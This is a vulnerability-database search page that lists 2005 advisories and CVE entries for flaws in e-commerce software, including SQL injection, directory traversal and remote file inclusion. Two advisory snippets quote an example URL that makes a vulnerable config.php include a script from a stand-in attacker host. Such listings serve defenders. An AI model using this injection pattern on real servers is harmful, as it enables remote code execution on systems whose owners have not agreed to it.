Lucene search
+L

2560 matches found

openvas
openvas
added 2005/11/03 12:0 a.m.9 views

redhat Interchange

It seems that 'Red Hat Interchange' ecommerce and dynamic content management application is running in 'Inet' mode on this port. Versions 4.8.5 and earlier are flawed and may disclose contents of sensitive files to attackers. OpenVAS neither checked Interchange version nor tried to exploit the...

0.3AI score
Exploits0
openvas
openvas
added 2005/11/03 12:0 a.m.11 views

redhat Interchange

It seems that SPDX-FileCopyrightText: 2005 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only Note: this service is not a web server, but it looks like it for findservice HEAD...

7.1AI score
Exploits0References1
drupal
drupal
added 2005/10/30 12:0 a.m.9 views

Unintentionally logging credit card transactions

Solar Designer of the Openwall Project reported a security vulnerability in the contributed authorizenet module which is part of the ecommerce package. Credit card information was being stored in a system log file. The system should not be saving this information. Versions affected Please check t...

5.4AI score
Exploits0References5
packetstorm
packetstorm
added 2005/10/12 12:0 a.m.34 views

phpshopSQL.txt

----------------------------------------------------- Nightmare TeAmZ Advisory 007 ------------------------------------------------------ Date - 10/2005 PhpShop Sql Injction AFFECTED PRODUCTS ================= PhpShop http://www.virtualdimensions.co.uk OVERVIEW ======== This is a great ecommerce...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2005/09/26 12:0 a.m.39 views

[SA16903] Mall23 eCommerce "idOption_Dropdown_2" SQL Injection Vulnerability

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

0.7AI score
Exploits0
nvd
nvd
added 2005/09/22 10:3 a.m.11 views

CVE-2005-3039

SQL injection vulnerability in infopage.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idPage parameter...

7.5CVSS8.4AI score0.01316EPSS
Exploits1References3
nvd
nvd
added 2005/09/22 10:3 a.m.12 views

CVE-2005-3043

SQL injection vulnerability in AddItem.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idOptionDropdown2 parameter...

7.5CVSS8.4AI score0.01399EPSS
Exploits1References7
cve
cve
added 2005/09/22 4:0 a.m.54 views

CVE-2005-3039

CVE-2005-3039 describes an SQL injection in Mall23 eCommerce where the infopage.asp script processes the idPage parameter, enabling remote arbitrary SQL execution. The issue arises from improper handling of user-supplied input in the SQL query, consistent with the CVSS data indicating network acc...

7.5CVSS8.8AI score0.01316EPSS
Exploits1References3Affected Software1
cvelist
cvelist
added 2005/09/22 4:0 a.m.22 views

CVE-2005-3043

SQL injection vulnerability in AddItem.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idOptionDropdown2 parameter...

8.4AI score0.01399EPSS
Exploits1References7
cvelist
cvelist
added 2005/09/22 4:0 a.m.17 views

CVE-2005-3039

SQL injection vulnerability in infopage.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idPage parameter...

8.4AI score0.01316EPSS
Exploits1References3
cve
cve
added 2005/09/22 4:0 a.m.49 views

CVE-2005-3043

Mall23 eCommerce is affected by a SQL injection in AddItem.asp, allowing remote attackers to inject arbitrary SQL via idOption_Dropdown_2. The issue has CVSS2 base score 7.5 (HIGH) with network/low complexity/unauthenticated access and partial impact on confidentiality, integrity, and availabilit...

7.5CVSS8.8AI score0.01399EPSS
Exploits1References7Affected Software1
securityvulns
securityvulns
added 2005/09/12 12:0 a.m.32 views

[SA16778] Mall23 eCommerce "idPage" SQL Injection Vulnerability

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

0.7AI score
Exploits0
cvelist
cvelist
added 2005/08/10 4:0 a.m.27 views

CVE-2005-2544

PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...

7.6AI score0.01453EPSS
Exploits0References5
cve
cve
added 2005/08/10 4:0 a.m.44 views

CVE-2005-2543

The CVE-2005-2543 entry describes a directory traversal vulnerability in Comdev eCommerce 3.0, specifically in wce.download.php, where the download parameter can be abused with a .. (dot dot) to download arbitrary files. Affected product/component: Comdev eCommerce 3.0 / wce.download.php. Root ca...

5CVSS6.7AI score0.05991EPSS
Exploits1References2Affected Software1
cvelist
cvelist
added 2005/08/10 4:0 a.m.19 views

CVE-2005-2543

Directory traversal vulnerability in wce.download.php in Comdev eCommerce 3.0 allows remote attackers to download arbitrary files via a .. dot dot in the download parameter...

6.7AI score0.05991EPSS
Exploits1References2
cve
cve
added 2005/08/10 4:0 a.m.54 views

CVE-2005-2544

The CVE-2005-2544 entry concerns Comdev eCommerce 3.0, where a PHP remote file inclusion flaw in config.php allows an attacker to execute arbitrary PHP code via path[docroot]. This is evidenced by multiple sources (NVD/CVE records and a Nessus plugin) describing remote code execution possibilitie...

5CVSS7.6AI score0.01453EPSS
Exploits0References5Affected Software1
nessus
nessus
added 2005/08/07 12:0 a.m.25 views

Comdev eCommerce 3.0 Multiple Vulnerabilities (RFI, Traversal)

The remote host is running eCommerce, a web-based shopping system from Comdev. The installed version of eCommerce allows remote attackers to control the 'pathdocroot' parameter used when including PHP code in the 'config.php' script. By leveraging this flaw, an attacker may be able to view...

5CVSS6.2AI score0.05991EPSS
Exploits1References4
packetstorm
packetstorm
added 2005/08/06 12:0 a.m.28 views

comdevInclusion.txt

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2005/08/06 12:0 a.m.34 views

Comdev eCommerce config.php Vulnerability

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

0.7AI score
Exploits0
packetstorm
packetstorm
added 2005/08/06 12:0 a.m.33 views

comdevTraversal.txt

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The wce.download.php script present in two locations can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server. Example:...

7.4AI score
Exploits0
Rows per page
Query Builder